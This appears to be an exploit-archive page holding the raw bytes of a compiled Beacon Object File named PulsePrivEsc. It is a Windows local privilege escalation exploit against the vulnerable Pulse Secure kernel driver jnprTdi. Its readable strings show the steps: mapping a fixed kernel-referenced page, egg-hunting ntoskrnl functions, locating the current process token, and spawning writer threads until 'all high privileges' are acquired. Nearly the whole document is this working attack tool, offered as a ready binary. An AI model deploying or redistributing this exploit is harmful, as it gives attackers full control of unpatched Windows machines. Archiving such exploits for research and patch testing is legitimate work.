4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / PulsePrivEsc.x64.o O
d��,B.text0,\$� P`.data@P�.bss�P�.xdata�\@[email protected]��*0@[email protected]`	�@P@/4 <$@P@UH��H�� H�MH�UH�EH��H���H��H�UH�EI��H��H���H��u���H�� ]�UH��H��PH�M�E��E�H�U�I��A����H���=�t"H�H�¹
H��и�p�E܉�H�¹@H���H�E�H�}�u"H�XH�¹
H��и�-�U�H�M�H�E�I��A��H�¹H��Ѕ�y2H��H�¹
H���H�E�H��H��и��H�E��E��E���U�H��H��H�H��H�H��H�P H�E�H�H�HH�EH��H���H��t@H�M�U�H��H��H�H��H�H��H�H��H�H�E�H�E�H��H���H�E��D�E��E�;E��t���H�EI��H��H�¹
H���H�E�H��H��иH��P]�UH��H��$�H��Dž�H���I��H�HH��H��H��Ѕ�t
��HDž�HDž��H�E�H�jH���\���������H���H���H�U�I��H��H��Ѕ��dH���H���H�T$0H�D$(H�D$ A���L�r�H��H��Ѕ����������H���H���H�T$0H���H�T$(H�D$ A���L�r�H��H��Ѕ�����H���H���H����H���H��H���I�кH��H��Ѕ�utH����@=}�dGudH����@=���uSH����@=��huBH����@=(�.u1H�U�H��A�H��H��и�M��
�������H���H�����H���H�U�A�I�Љ�H��H��Ѕ������H�Ā]�UH��H��PH�MH�EH�D$0�D$(��D$ A�A���H��H���H�E�H�}��u��H�E�H��H��иH��P]�UH��H�� H�M�E�`�E�eH�H�E�H�E�H�E�H�E���H�E�H�E���H�E�PH�E��� H�E�P�H�� ]�UH��H��0H�E�H���������t��%�E�
t���E�=�Uv���H��0]�UH��H��0H�E�H���<�������t��%�E�
t���E�=�Uw���H��0]�UH��H��0H�MH�UL�E H�E��>H�U H�E�H��<xu'H�UH�E�H��H�MH�E�H��8�t��2H�E�H�E H��H���H9E�r�H�E H��H���H9E���H��0]�UH��H��0H�MH�UH�EA��H��H���H�E�H�}�u��1H�UH�E�H��H���H�E�H�}�u��H�E�H�U�H)�H��0]�UH��H��H�MH�UL�E H�E�H�EA��H��H���H�E�H�}�u)H���A��H��H�¹
H����yH���H��H�U�H�E�A�I��H��H��Ѕ����E��E߃���t)H���A��H��H�¹
H�����E���H�E�H�EкH��H���H�E�H�E�H���A����H���H�E�H�}�u)H���A��H��H�¹
H����H�M�H�U�L�M�L�E�H�E�H�L$ H��H��Ѕ�u&H���A��H�H�¹
H����HH�E��2H�U�H�E�H�H�U H�EI��H���5�����t
H�E�H�E��H�E��E���H9E�rÐH�}�tH�E�H��H���H�E�H�Đ]�USH��XH�l$PH�M �E��H��ЉE�]�H���I�غH��H���H�E�H�}�u
����U�H�E�A�A��H�¹@H��ЉE�}�y�E�H��h�E��K�U�H��H��H�H��H�PH�E�H�H�E؋U�H�E�H�@H9�uH�E�H�@H9E u	H�E�H���E��U�H�E�H�H9�r��H��X[]�UH��H�ĀH�M��H���H�E���H���H�E��H���H�E��H���H�E��0H���H�E�H�E�H�E�%�H�E�H�E�H��HE�H�E�@��H���H�E�H�H�E�H�U�H�E�H�H�E�H�P(H�E�H�H�E�H�P0H�E�H�H�EH�PH�E�H�H�E�H��hH�H�E�H��H�H�E�H��H�H�E�H�PH�E�H�H�E�H��PH�H�EH�P H�EH�@(H�H�E�H��pH�H�EH�P H�EH�@0H�H�E�H��`H�H�EH�P H�EH�@8H�H�E�H��xH�H�EH�H�M�H�D$8H�U�H�T$0�D$(H�D$ A�I�Ⱥ �H��H��АH��]�UH��H��pH�MH�EH�@H�D$0�D$(�D$ A�A���H��H���H�E��@�H���H�E�H�E�H�U�H�H�EH�@H�PH�E�H�PH�E�@f����H�E�PH�EH�PH�E�H�PH�EH�P H�E�H�P H�EH�P(H�E�H�P(H�EH�P0H�E�H�P0H�EH�P8H�E�H�P8H�E�H�D$(�D$ I��L������H���H�E�H�E����H��H���H�EH�@H�D$0�D$(�D$ A�A���H��H���H�E�@�H���H�E�H�E�H�U�H�H�EH�PH�E�H�PH�E�@��H�E؈PH�EH�PH�E�H�PH�EH�P H�E�H�P H�EH�P(H�E�H�P(H�EH�P0H�E�H�P0H�EH�P8H�E�H�P8H�E�H�D$(�D$ I��L����H���H�E�H�Eк����H��H��АH��p]�UH��H�Ā��H�UL�E L�M(�E�}q��@�H���H�E�H�EH�PH�E�H�PH�E H��0��H�E�f�PH�E�H�U(H�PH�E�H�U0H�P H�E�H�U8H�P(H�E�H�U@H�P0H�E�H�UHH�P8H�E�H�������@�H���H�E�H�EH�PH�E�H�PH�E H�� ��H�E�f�PH�E�H�U(H�PH�E�H�U0H�P H�E�H�U8H�P(H�E�H�U@H�P0H�E�H�UHH�P8H�E�H������Ed�}d���@�H���H�E�H�EH�PH�E�H�PH�E H����H�E�f�PH�E�H�U(H�PH�E�H�U0H�P H�E�H�U8H�P(H�E�H�U@H�P0H�E�H�UHH�P8H�E�H�����Ew�}wuy�@�H���H�E�H�E�H�UH�PH�E ��H�E�f�PH�E�H�U(H�PH�E�H�U0H�P H�E�H�U8H�P(H�E�H�U@H�P0H�E�H�UHH�P8H�E�H���n����}b�H�E(H�D$0�D$(�D$ A�A���H��H���H�Eغ@�H���H�E�H�E�H�U�H�H�E�H�UH�PH�E ��H�EЈPH�E�H�U(H�PH�E�H�U0H�P H�E�H�U8H�P(H�E�H�U@H�P0H�E�H�UHH�P8H�E�H�D$(�D$ I��L�������H���H�E�H�EȺ����H��H��АH��]�UH��H��H�E�H�E�H�E�H�E�H�E�H�E�H�:H�¹H����~����t)�����tH�XH�¹
H�����H��H�¹H��к�H���H�E�H�E�H���������tH�H�¹
H����H�E�I��H�CH�¹H��к�H���H�E�H�E�A�H�`H��H���H�U�H�E�A�H��H���H�E�H�������teH�hH�¹
H���H��H�¹
H���H�H�¹
H���H�hH�¹
H����H��H�¹H���H��H�¹H���A�A�0��� �H��H���H�H�E�H�E�=�t0H���H�U�A��I��H��H�¹
H����H�E�I��H�`H�¹H���H��H�¹H���H��H����H�E�H�}�uH��H�¹
H����H�E�I��H�H�¹H���H�*H��H�@H����H�E�H�}�uH�hH�¹
H����'H�U�H�E�H�I��H��H�¹H����~��tJL��H��H��H�@H����H�E�L�H�H��H�@H�����H�E��Q�x��tHL�)H�:H��H�@H����H�E�L�H�H��H�@H����H�E�H�}�uH�PH�¹
H����9H�U�H�E�H�I��H��H�¹H���H�}�uH��H�¹
H�����H�U�H�E�H�I��H�H�¹H���H�@H�¹H���H���H�U�I�к(H��H���H�E�H����H�E�H�}�uH�hH�¹
H����\H�E�I��H��H�¹H���H��H�¹H���H�E�H��PH��H�U�H�E�H�D$8H�E�H�D$0H�E�H�D$(H�E�H�D$ I��I�����H�ʹq�<���H�E�H��HH��H�U�H�E�H�D$8H�E�H�D$0H�E�H�D$(H�E�H�D$ I��I�����H�ʹq���H�E�H��@H��H�U�H�E�H�D$8H�E�H�D$0H�E�H�D$(H�E�H�D$ I��I�����H�ʹq���H��H�¹H��йpH���H�0	H�¹H���H�}�tH�E�A����H��H��АH�Đ]�UH��H�� H�M�U�l����H�� ]Ð�����2P�P�PP�P2PRPRPRPRPPU�0P�P�P�PP2PQQ##��$e0e�<��H��T�`
	l
	
x
���G�G����*�Cannot get length of system module list array while trying to obtain an image base.Cannot allocate memory for system module list while trying to obtain an image base.Cannot get system module list while trying to obtain an image base.Cannot find %s in system module list while trying to obtain an image base.SYSTEM\CurrentControlSet\ServicesjnprTdiImagePathLoadLibraryExA failed. LastError: 0x%.8x.GetModuleInformation failed. LastError: 0x%.8x.OpenProcess failed. LastError: 0x%.8x.Failed to read process memory. LastError: 0x%.8x.Starting PulsePrivEsc...This exploit is only tested on Windows 10 and 11. If you know what you're doing, you may adjust the code to allow running the exploit on other Windows versions.Running on Windows 10 or 11.Vulnerable kernel driver is not installed.Found vulnerable driver: %s.\\.\Vulnerable kernel driver is not running or TDI-failover is not configured.Setup an virtual evaluation appliance of Pulse Secure with TDI-failover.Connect the victim machine to that appliance using `pulselauncher.exe` to start the driver.Read the `README.md` for more information.Vulnerable kernel driver is running.Mapping the page that references address 0x80002018.Unable to map the page backing address 0x80002018 (allocatedBaseAddress = 0x%lX). LastError: 0x%.8x.Mapped page backing address 0x80002018 (allocatedBaseAddress = 0x%lX).Trying to obtain ntoskrnl.exe base.ntoskrnl.exeCould not obtain ntoskrnl.exe base.Obtained ntoskrnl.exe base: %llX.KeTestSpinLockc:\windows\system32\ntoskrnl.exeUnable to find `KeTestSpinLock` in `ntoskrnl.exe` via `GetProcAddress`.Obtained `KeTestSpinLock` address: %llX.xxxxxxxxxxxxxxxxxxxxxxxxH�\$H�t$WH�� eH�4% xxxxxxxxxxxxxx@SH�� �BI�ب@xxxx?xxxxxxxxxxxH�\$WH�� H��3ېUnable to find `KxWaitForSpinLockAndAcquire` in `ntoskrnl.exe` via egg hunt.Obtained `KxWaitForSpinLockAndAcquire` address: %llX.Unable to find `write_char_0` in `ntoskrnl.exe` via egg hunt.Obtained `write_char_0` address: %llX.Trying to obtain current process token.Unable to obtain handle to current process token.Obtained token address of current process: %p.Creating writer thread(s)...Writer thread(s) have been created. Sleeping for 6 seconds...Finished. You've acquired all high privileges.GCC: (GNU) 13.2.0!4"~#��$�%��$#($8&�'�&�$&Qb(��()cr)�*�+,,s-�.�/e!{!�0�160J2Ve$s3�4�2��$�*56,28G$q7~2��$�/&	55	8I	9	#
*4
*K
*b
*y
*�:0.G*
;
<X
.o
*!;:<w*�*�**�.�*i;�<��$�$)$<*\k$��$�*��,�=�$ $)8$AP$^m$v�$�>�2��$�$$(BQ$fu$~���$��$���#AHRelv��$��$��$$,$53M?m|$��$��$��$�@��$�A $(,048<@DHLPTX\`dhlptx|����������������.file��gPulsePrivEsc.c Q '# D� ^ pe |� �� �� � �
	 
 � G boot� go .text*�.data.bss.xdata�.pdata�0.rdata_	'2F[������'AVq����� Ad����3Hd���.rdata$zzzstartsWithgetImageBasegetVulnerableDriverInstalledisVulnerableDriverRunninggetWindowsVersionisWindows10isWindows11byteSequenceStartsWithByteSequencefindFunctionOffsetByExportfindFunctionOffsetInImageByByteSequenceGetObjectPointerByHandlewrite_bytewrite_wordwrite_mem.rdata$zzz__imp_MSVCRT$strlen__imp_MSVCRT$strncmp__imp_NTDLL$NtQuerySystemInformation__imp_BeaconPrintf__imp_KERNEL32$GlobalAlloc__imp_KERNEL32$GlobalFree__imp_MSVCRT$strstr__imp_ADVAPI32$RegOpenKeyA__imp_ADVAPI32$RegGetValueA__imp_MSVCRT$calloc__imp_MSI$MsiGetFileHashA__imp_MSVCRT$strncpy__imp_ADVAPI32$RegEnumKeyA__imp_KERNEL32$CreateFileA__imp_KERNEL32$CloseHandle__imp_KERNEL32$LoadLibraryExA__imp_KERNEL32$GetProcAddress__imp_KERNEL32$GetLastError__imp_KERNEL32$GetCurrentProcess__imp_PSAPI$GetModuleInformation__imp_KERNEL32$GetCurrentProcessId__imp_KERNEL32$OpenProcess__imp_KERNEL32$ReadProcessMemory__imp_KERNEL32$GetProcessHeap__imp_KERNEL32$HeapAlloc__imp_KERNEL32$DeviceIoControl__imp_KERNEL32$CreateThread__imp_KERNEL32$SetThreadPriority__imp_MSVCRT$strncat__imp_KERNEL32$VirtualAlloc__imp_ADVAPI32$OpenProcessToken__imp_KERNEL32$Sleep__imp_KERNEL32$VirtualFree